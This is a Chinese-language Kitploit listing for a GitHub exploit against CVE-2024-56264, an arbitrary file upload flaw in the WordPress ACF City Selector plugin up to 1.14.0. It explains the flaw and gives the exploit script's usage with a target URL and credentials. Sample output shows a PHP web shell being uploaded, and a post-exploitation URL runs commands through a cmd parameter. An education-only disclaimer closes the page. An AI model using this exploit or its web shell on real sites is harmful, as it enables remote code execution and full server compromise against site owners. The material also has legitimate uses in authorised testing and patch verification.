Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-56264 — WordPress ACF City Selector 插件 <= 1.14.0 - 任意文件上传漏洞 | Kitploit
工具/GitHubGitHub/nxploited/cve-2024-56264
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubnxploited/cve-2024-56264

CVE-2024-56264

WordPress ACF City Selector 插件 <= 1.14.0 - 任意文件上传漏洞

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-56264

WordPress ACF City Selector - 任意文件上传漏洞利用 (CVE-2024-56264)

概述

此仓库包含针对 CVE-2024-56264 的利用代码,该漏洞是 WordPress ACF City Selector 插件(版本 <= 1.14.0)中发现的任意文件上传漏洞。此漏洞允许攻击者将**恶意 PHP 文件(Web Shell)**上传到存在漏洞的 WordPress 实例,并在服务器上执行任意命令。

CVE 详情

  • CVE ID: CVE-2024-56264
  • 发布日期: 2025年1月2日
  • 受影响插件: ACF City Selector
  • 受影响版本: <= 1.14.0
  • 影响: 通过无限制文件上传实现远程代码执行 (RCE)

描述

ACF City Selector 插件未能正确验证上传的文件,允许攻击者绕过限制并上传任意 PHP 文件。一旦恶意 PHP 文件上传,攻击者即可远程执行系统命令,导致服务器完全沦陷。

要求

📌 依赖项

在运行脚本之前,请确保已安装以下内容:

  • Python 3.x
  • requests 模块(安装命令:pip install requests)

您可以使用以下命令安装所有必需的依赖项:

root@kitploit:~
pip install -r requirements.txt

🚀 使用方法

运行利用脚本:

root@kitploit:~
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability

options:
  -h, --help           show this help message and exit
  --url URL            Website base URL (e.g., http://192.168.100.74/wordpress)
  --username USERNAME  WordPress username
  --password PASSWORD  WordPress password

示例:

root@kitploit:~
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin

预期输出

利用成功后,您应该看到:

root@kitploit:~
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php

后渗透利用

如果成功,请通过以下地址访问上传的 shell:

root@kitploit:~
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami

这将允许在服务器上执行远程命令。

⚠ 免责声明

此脚本仅用于教育和授权的安全测试目的。未经授权的使用是非法的,可能导致严重后果。作者不对任何滥用此漏洞利用程序的行为负责。

下载工具